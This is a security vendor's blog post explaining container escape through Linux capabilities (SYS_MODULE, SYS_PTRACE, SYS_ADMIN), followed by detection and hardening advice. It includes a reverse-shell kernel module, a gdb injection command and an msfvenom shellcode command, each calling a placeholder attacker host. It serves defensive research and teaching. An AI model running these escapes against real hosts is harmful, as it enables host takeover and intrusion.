Cybereason Blog | Cybersecurity News and Analysis

Container Escape: All You Need is Cap (Capabilities)

Written by Cybereason Team | Oct 5, 2022 2:27:36 PM

Until a few years ago, most cyberattacks focused mainly on the endpoint. However, new technologies like IoT devices, mobile, and cloud have transformed the entire tech industry – and the way attacks are carried out.

Containers are now used by virtually all enterprises for day-to-day operations, making them a prime target for attackers. As a result, the number of cyberattacks involving containers has significantly increased, and security researchers and blue teams must be familiar with this field.  

The container attack surface differs somewhat from the endpoint attack surface. Some attacks take place entirely within the container, for example when attackers exploit a vulnerability in the Docker runtime or take advantage of a misconfigured container.

In other circumstances, the attackers want to expand their attacks and move to other assets in the victim's network, and to do so, they can break out of the container. Breaking out from the container is also known as "container escape," which is considered the Holy Grail of the container security attack world. It allows an attacker to escape from a container to the underlying host. By doing so, the attacker can move laterally to other containers from the host or perform actions on the host itself. 

VM Escaping

We must dive into internal container principles to truly understand the concept of containers and the specific attack vectors. The first step is to recognize that most containers are not virtual machines (VMs) but, rather, ordinary processes that are restricted on a machine using various isolation mechanisms. The primary distinction between a virtual machine and a container is that a VM runs its own guest kernel on virtualized hardware, whereas a container shares the host kernel:

Difference between virtual machines and containers

There are many ways to manage containers. Here, we will focus on Docker runtime and Kubernetes container orchestration platforms. Container orchestration solutions like Kubernetes are often used because managing containers at scale necessitates the use of an automated platform.

In this post, and the upcoming ones, we will explain how adversaries can abuse some container isolation mechanisms to perform container escape and how we can reduce the risk from this kind of attack. 

We will explore one of the leading Linux isolation mechanisms applied to containers – capabilities – and learn how malicious actors can take advantage of them to break out from containers.

What are Capabilities?

Capabilities provide the ability to give a specific set of privileges to a thread/process. They do so by breaking down the dichotomy between privileged and unprivileged that embodies "all or nothing" into logical groups of privileges. All privileged actions have been thought out and categorized into a set of approximately 40 capabilities. 

That means that a process/thread can be granted only the privileges it actually needs, lowering the risk of abuse and unexpected behavior. In other words, the purpose of capabilities is to divide root privilege into distinct privileges. Capabilities can be applied to container processes; in this way, all processes that are part of that container inherit its capabilities.

When a capability is assigned to a container, the caller thread can launch a set of system calls associated with the capability. That means that having a particular capability allows it to execute specific system calls related to it:

Root privileges breakdown into capabilities and system calls 

Most capabilities are atomic units that gate a constrained number of system calls. Still, some of them are overloaded, such as the SYS_ADMIN capability, which is frequently referred to as the "new root". CAP_PERFMON, CAP_BPF, and CAP_CHECKPOINT_RESTORE are just a few of the newer capabilities whose privileges were split out of SYS_ADMIN, which still grants them.

The SYS_ADMIN capability also enables us to carry out a wide range of privileged file system operations and system administration tasks, such as quotactl(2), mount(2), and umount(2). A complete list of capabilities is maintained here.

In our examples, we will utilize the built-in features of container runtimes to control the container's capabilities. Container runtimes are in charge of loading container images from a repository, keeping track of local system resources, utilizing Linux features such as capabilities to be used by a container, and managing the lifespan of containers in a containerized architecture. 

Here are examples of commands that can be used with the Docker runtime:

  • Add a new capability to the container

 docker run --cap-add=<CAP> -it <Image_Name>

  • Add all the capabilities to the container

 docker run --cap-add ALL -it <Image_Name>

  • Drop an existing capability from the container

 docker run --cap-drop=<CAP> -it <Image_Name>

  • Drop all the capabilities from the container

 docker run --cap-drop ALL -it <Image_Name>
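The add and drop flags above can be combined in a single command. As a minimal sketch (the helper name docker_run_args is our own, not part of Docker), the following Python snippet builds a docker run command line that drops every capability first and then adds back only the ones passed in:

```python
import shlex


def docker_run_args(image, add_caps=(), interactive=True):
    """Build a `docker run` argv that drops all capabilities, then adds back `add_caps`."""
    args = ["docker", "run", "--cap-drop", "ALL"]
    for cap in add_caps:
        args += ["--cap-add", cap]
    if interactive:
        args.append("-it")
    args.append(image)
    return args


# Print the command instead of running it, so it can be reviewed first.
print(shlex.join(docker_run_args("ubuntu", ["NET_BIND_SERVICE"])))
```

The snippet only prints the command; passing the list to subprocess.run would execute it on a machine where Docker is installed.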

In Kubernetes, you can add or drop capabilities in the SecurityContext field of a Container:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  containers:
  - name: ubuntu-container
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_MODULE
        drop:
        - CHOWN

Adding or dropping capabilities

By default, Docker runtimes start the containers with a limited set of capabilities:

cap_chown, cap_dac_override, cap_fowner, cap_fsetid, cap_kill, cap_setgid, cap_setuid, cap_setpcap, cap_net_bind_service, cap_net_raw, cap_sys_chroot, cap_mknod, cap_audit_write, cap_setfcap

Default capabilities in Docker container V20.10.7
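A quick way to reason about a container's configuration is to compare its capability set with this default list. The sketch below assumes the capabilities are already available as names (for example from capsh output); the function names are ours and purely illustrative:

```python
# Docker's default capability set, as listed above for Docker 20.10.7.
DOCKER_DEFAULT_CAPS = frozenset({
    "cap_chown", "cap_dac_override", "cap_fowner", "cap_fsetid", "cap_kill",
    "cap_setgid", "cap_setuid", "cap_setpcap", "cap_net_bind_service",
    "cap_net_raw", "cap_sys_chroot", "cap_mknod", "cap_audit_write",
    "cap_setfcap",
})


def normalize(cap):
    """Accept both 'SYS_MODULE' and 'cap_sys_module' spellings."""
    cap = cap.lower()
    return cap if cap.startswith("cap_") else "cap_" + cap


def diff_from_default(caps):
    """Return (added, dropped) relative to Docker's default capability set."""
    current = {normalize(c) for c in caps}
    return sorted(current - DOCKER_DEFAULT_CAPS), sorted(DOCKER_DEFAULT_CAPS - current)


# The Kubernetes example above adds SYS_MODULE and drops CHOWN.
example = (DOCKER_DEFAULT_CAPS - {"cap_chown"}) | {"SYS_MODULE"}
print(diff_from_default(example))
```

Anything in the "added" list deserves a justification, since it goes beyond what the runtime grants on its own.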

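It is worth noting that we may execute a container with the --privileged flag, which grants the container all of the capabilities and lifts most of the other isolation mechanisms (for example, the default seccomp and AppArmor confinement and the restrictions on host devices). For practical purposes, a root process in such a container is as powerful as a root process on the host machine. Therefore, in the examples that follow, the capability additions can be replaced with this flag.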

To run a privileged container in Docker runtime:

docker run --privileged -it <image_name>

 

To run a privileged container in Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  hostPID: true
  containers:
  - name: privileged-container
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      privileged: true

 

Capabilities Discovery

Once we are in the container, we can perform capability discovery to determine which privileges are allowed in the container. The container capabilities can be viewed by reading the content of the main container process (PID = 1) status from within the container: 

root@2416b7f009ee:/proc# grep Cap /proc/1/status
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

Capabilities discovery
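When this check needs to be scripted, the same fields can be pulled out of the status text programmatically. The following is a minimal sketch, assuming the text has already been read from /proc/1/status; the function name parse_cap_sets is our own:

```python
def parse_cap_sets(status_text):
    """Extract the Cap* fields of a /proc/<pid>/status dump as integers."""
    sets = {}
    for line in status_text.splitlines():
        name, _, value = line.partition(":")
        if name.startswith("Cap"):
            sets[name] = int(value.strip(), 16)  # the kernel prints the masks in hex
    return sets


# Sample taken from the output above; on a live system, read /proc/1/status instead.
sample = """Name:\tbash
CapInh:\t00000000a80425fb
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""
for name, mask in parse_cap_sets(sample).items():
    print(f"{name}: {mask:#018x}")
```

CapEff is the set the kernel actually checks when the process makes a privileged call, so it is usually the most interesting field.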

The capabilities are displayed as bitmasks, and each bit in the bitmask represents a different capability. The capability map can be found in this kernel header. We can use this map to decode the bitmask and find out which container capabilities have been configured.

The most popular tool to discover and debug capabilities is capsh. However, it is not available by default and needs to be installed on the machine. Using the capsh tool, we can decode the bitmask by executing capsh --decode=<CAP_BITMASK>:

attacker@ubuntu:~$ capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

Decoding with capsh
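If capsh is not at hand, the bitmask can also be decoded by walking its bits. The sketch below hard-codes the capability names by bit number as we understand them from the kernel's capability header (bits 0 to 40 as of Linux 5.9); treat the table as an assumption to verify against the header of the kernel you are analyzing:

```python
# Capability names indexed by bit number (assumed to match linux/capability.h).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]


def decode_caps(mask_hex):
    """Translate a hex capability bitmask into a list of capability names."""
    mask = int(mask_hex, 16)
    names = []
    for bit in range(mask.bit_length()):
        if (mask >> bit) & 1:
            # Bits beyond the table belong to capabilities newer than this list.
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"unknown_{bit}")
    return names


print(",".join(decode_caps("00000000a80425fb")))
```

For the mask shown above, this yields the same fourteen names that capsh prints.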

As we mentioned earlier, capsh is not available by default. If it is installed, we can use it in the victim container to discover the capabilities by running capsh --print:

root@2416b7f009ee:/home# capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)

Capabilities discovery using capsh
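Whichever way the effective set is obtained, the practical question is whether it contains a capability that matters. As a rough sketch, the check below tests a CapEff value for the three capabilities this post focuses on (SYS_MODULE, SYS_PTRACE, and SYS_ADMIN); the bit numbers are our reading of the kernel's capability header, and the function name is illustrative:

```python
# Bit positions assumed from linux/capability.h.
RISKY_CAP_BITS = {
    "cap_sys_module": 16,  # load and unload kernel modules
    "cap_sys_ptrace": 19,  # trace and control other processes
    "cap_sys_admin": 21,   # the overloaded "new root" capability
}


def risky_caps(cap_eff):
    """Return the risky capabilities present in an effective-set bitmask (int)."""
    return [name for name, bit in RISKY_CAP_BITS.items() if (cap_eff >> bit) & 1]


default_mask = 0xA80425FB
print(risky_caps(default_mask))              # Docker defaults
print(risky_caps(default_mask | (1 << 16)))  # defaults plus SYS_MODULE
```

The same check is useful on the defensive side, for example when auditing running containers for capabilities they were never meant to have.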

So, now that we’ve covered container capabilities, it's time to see how we can take advantage of them to perform a container escape. There are many ways to abuse container capabilities; here, we'll focus on three: 

  • Container escape via a Kernel module
  • Container escape via process debugging using gdb
  • Container escape via shellcode injection using a custom injector

Container Escape via a Kernel Module

In this scenario, we will show how to abuse a container that has the SYS_MODULE capability, which allows loading and unloading kernel modules. For each scenario in this post, we list the minimum required capabilities; the same access can also be obtained with the '--privileged' flag, as explained earlier. For this attack, the only requirement is that the container is started with the SYS_MODULE capability.

Here are examples of how to add this capability using Docker and Kubernetes:

Docker:

docker run --cap-add=SYS_MODULE -it ubuntu bash


Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  containers:
  - name: container-escape-via-kernel-module
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_MODULE

 

The next step starts when the attacker achieves initial access to the container and finds out that the SYS_MODULE capability is present. Then the attacker needs to deliver the malicious module to a container. 

One way is by uploading a module already compiled on the attacker's machine. Since there are many variations between kernel versions, and some modules might not function on a different version, this option can be problematic. 

Another option is to build a new kernel module on the compromised container, which we'll demonstrate. To create a kernel module that executes a reverse shell, we relied on open-source code from GitHub and adapted it to fit our purpose:

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kmod.h>

MODULE_LICENSE("GPL");

/* Launches a user-mode helper from kernel context, i.e. outside the container. */
static int start_shell(void)
{
    char *argv[] = { "/bin/bash", "-c",
                     "bash -i >& /dev/tcp/<ATTACKER_IP>/<LISTENER_PORT> 0>&1", NULL };
    static char *env[] = {
        "HOME=/",
        "TERM=linux",
        "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };

    return call_usermodehelper(argv[0], argv, env, UMH_WAIT_PROC);
}

/* Runs once when the module is loaded. */
static int __init init_mod(void)
{
    return start_shell();
}

/* Nothing to clean up on unload. */
static void __exit exit_mod(void)
{
}

module_init(init_mod);
module_exit(exit_mod);

 

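Before compiling the module, the attacker must ensure that kernel headers matching the host's running kernel are installed in the container (the container shares the host kernel, so uname -r reports the host's version). Now the attacker creates a Makefile on disk, which contains the build instructions: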

obj-m += revshell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

 

Then the attacker runs the “make” command to compile and link the module according to the Makefile instructions. Finally, the attacker loads the kernel module with insmod, which gives the attacker code execution at the kernel level on the host:

insmod revshell.ko

 

Container escape via kernel module

Once we install the module, a reverse shell session will be created on the attacker machine from the container's host:

Container escape via Kernel Module installation as seen in the Cybereason Defense Platform

Container Escape via SYS_PTRACE

In this scenario, we will show how to abuse containers with SYS_PTRACE capability, which allows the use of ptrace(). This system call allows a process to monitor and control the execution of another process. 

To perform this attack, the container must be started with the option --pid=host, which makes the container share the host's PID namespace, allowing the container process to see every other process running on the host. 

We will demonstrate how to pull this off using two techniques:

Process Debugging

For this technique, we will use gdb to attach to an already running process and call the system function to run the reverse shell.

The minimal requirement to perform this type of attack is to grant the SYS_PTRACE and SYS_ADMIN capabilities to the container and to run it with an AppArmor profile (AppArmor is a Linux kernel security module that restricts what processes in the container may do) with either:

  • allow ptrace()
  • Unconfined

Here are examples of how to add these capabilities using Docker and Kubernetes (by default, the seccomp policy in Kubernetes is Unconfined):

Docker:

docker run --security-opt apparmor=unconfined --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --pid=host -it ubuntu bash

 

Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  hostPID: true
  containers:
  - name: container-escape-via-ptrace
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_PTRACE
        - SYS_ADMIN

 

Firstly, we need to make sure that gdb is installed on the container. If not, we might need to install it:

apt-get update
apt-get install gdb

 

After that, we will list the currently operating processes in order to determine a target process to debug:

ps -ef
or
ls /proc
or
pidof <processname>

 

Now we can attach our debugger to the running process and make it call a system function that will execute a bash reverse shell:

gdb -p <PID>
call (void)system("bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1'")

 

At this point, the process will spawn a child process of bash, which will execute a reverse shell to the attacker machine:

Container escape via process debugging 

Container escape via process injection as seen in the Cybereason Defense Platform

Shellcode Injection

For this technique, we will use a custom-made injector to attach to an already running process and inject shellcode into it.

The minimal requirement to perform this type of attack is to grant the SYS_PTRACE capability and have an AppArmor profile with either:

  • allow ptrace()
  • Unconfined

Here are examples of how to add this capability using Docker and Kubernetes (By default Seccomp policy in Kubernetes is Unconfined).

Docker:

docker run --security-opt apparmor=unconfined --cap-add=SYS_PTRACE --pid=host -it ubuntu bash

 

Kubernetes:

apiVersion: v1
kind: Pod
metadata:
  name: <POD_NAME>
spec:
  hostPID: true
  containers:
  - name: container-escape-via-injection
    image: "ubuntu:latest"
    command: ["/bin/sleep", "3650d"]
    securityContext:
      capabilities:
        add:
        - SYS_PTRACE

 

Firstly, we need to generate a reverse shellcode on the attacker machine using msfvenom:

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c

 

To perform this type of attack, we created a dedicated injector which relied on this code. Then we copied the shellcode we generated earlier to the code, compiled it, and delivered it to the target machine.

The next step is to list the currently operating processes to determine a target process for the injection:

ps -ef
or
ls /proc
or
pidof <processname>

 

Then we will execute the injector with the PID we chose in the previous step:

At this point, the attacker receives a reverse shell from the underlying host:

Container escape via shellcode injection 

Container escape via process injection as seen in the Cybereason Defense Platform

Detection

Cybereason Cloud Workload Protection (CWPP) detects container escape, including in the scenarios we have outlined, by relying on behavioral analysis and machine learning. Cybereason collects data from multiple containers, pods, endpoints, and servers in real-time and uses an in-memory graph to cross-correlate this data to discover malicious activity. 

Instead of using signatures that can be easily changed, Cybereason looks for attack behavior:

Container Escapes as seen in the Cybereason Defense Platform

Best Practices

It is very common for containers to be configured, by design, with the capabilities mentioned above, and these capabilities are used for many legitimate activities. Therefore, it is important to verify that every capability granted to a container is truly necessary. 
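One way to make that verification repeatable is to lint pod manifests before they are deployed. The sketch below is a simplified illustration rather than a complete policy: it assumes the manifest has already been loaded into a Python dict (for example with a YAML parser), and the function name and finding messages are our own:

```python
RISKY_CAPS = {"ALL", "SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE"}


def audit_pod(pod):
    """Return human-readable findings for a pod manifest given as a dict."""
    findings = []
    spec = pod.get("spec") or {}
    if spec.get("hostPID"):
        findings.append("pod: shares the host PID namespace (hostPID: true)")
    for container in spec.get("containers") or []:
        name = container.get("name", "<unnamed>")
        ctx = container.get("securityContext") or {}
        caps = ctx.get("capabilities") or {}
        added = {c.upper() for c in caps.get("add") or []}
        dropped = {c.upper() for c in caps.get("drop") or []}
        if ctx.get("privileged"):
            findings.append(f"{name}: runs privileged")
        for cap in sorted(added & RISKY_CAPS):
            findings.append(f"{name}: adds {cap}")
        if "ALL" not in dropped:
            findings.append(f"{name}: does not drop ALL capabilities first")
        if ctx.get("allowPrivilegeEscalation") is not False:
            findings.append(f"{name}: allowPrivilegeEscalation is not disabled")
    return findings


# The ptrace example pod from earlier in this post, expressed as a dict.
ptrace_pod = {
    "spec": {
        "hostPID": True,
        "containers": [{
            "name": "container-escape-via-ptrace",
            "securityContext": {"capabilities": {"add": ["SYS_PTRACE", "SYS_ADMIN"]}},
        }],
    }
}
for finding in audit_pod(ptrace_pod):
    print(finding)
```

A check like this can run in CI or in an admission step, so that risky settings are questioned before a container ever starts.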

Here are some things that can be done to reduce the risk of container escape via capabilities:

  • When creating a new container, first drop all the capabilities, and – only after that – add the relevant ones for the purpose of the container.
  • Minimize the use of privileged containers, and run the container process as a non-root user rather than as root. Moreover, you can disable privilege escalation with the Kubernetes allowPrivilegeEscalation flag (always true when the container is run as privileged or has the CAP_SYS_ADMIN capability), or use the docker command line option:
    •  --security-opt=no-new-privileges
  • Try to avoid the use of the CAP_SYS_ADMIN capability.
  • Use a seccomp filter to block the system calls that a risky capability would otherwise unlock. For example, for SYS_MODULE, you can deny the module-loading system calls (init_module and finit_module) so that a new module cannot be installed.
  • Apply an AppArmor profile that will block the relevant capabilities of specific programs.
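To illustrate the seccomp recommendation, here is a minimal sketch that generates a profile in Docker's JSON seccomp format denying the module-related system calls. It is deliberately simplified: a default action of "allow" is weaker than Docker's built-in default profile, so in practice the deny rule would more likely be merged into that default profile. The helper name deny_profile is hypothetical:

```python
import json

# System calls used to load and unload kernel modules.
MODULE_SYSCALLS = ["init_module", "finit_module", "delete_module"]


def deny_profile(syscalls):
    """Build a seccomp profile that allows everything except `syscalls`."""
    return {
        "defaultAction": "SCMP_ACT_ALLOW",  # simplification, see the note above
        "syscalls": [
            {"names": list(syscalls), "action": "SCMP_ACT_ERRNO"},
        ],
    }


profile = deny_profile(MODULE_SYSCALLS)
print(json.dumps(profile, indent=2))
```

The resulting JSON can be saved to a file and passed to Docker with --security-opt seccomp=<path_to_profile>.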

You can now see how easily attackers can leverage misconfigurations in containers to escape to the host and take control of it, access sensitive data, or move laterally across the network. In the next post, we will dive into another container isolation mechanism and learn how we can perform container escape using it.

About the Authors

Eran Ayalon, Security Researcher on the Cybereason Security Research Team

Eran Ayalon specializes in detecting different attack frameworks on multiple OS. Eran started his career six years ago as a security researcher in the Israeli Air Force, where he specialized in malware analysis, forensics, and incident response. Eran's previous employment was in the banking sector, where he led threat hunting and incident response in corporate environments.

Ilan Sokol, Security Researcher on the Cybereason Security Research Team

Ilan Sokol specializes in Linux research. Before Cybereason, his work focused on research in the offensive security field. As a result, Ilan deeply understands the malicious operations prevalent in the current threat landscape. He is passionate about reverse engineering and malware analysis but is also interested in offensive aspects such as vulnerability research.

This research would not have been possible without the tireless effort and help of Oren Ofer, Principal Security Researcher.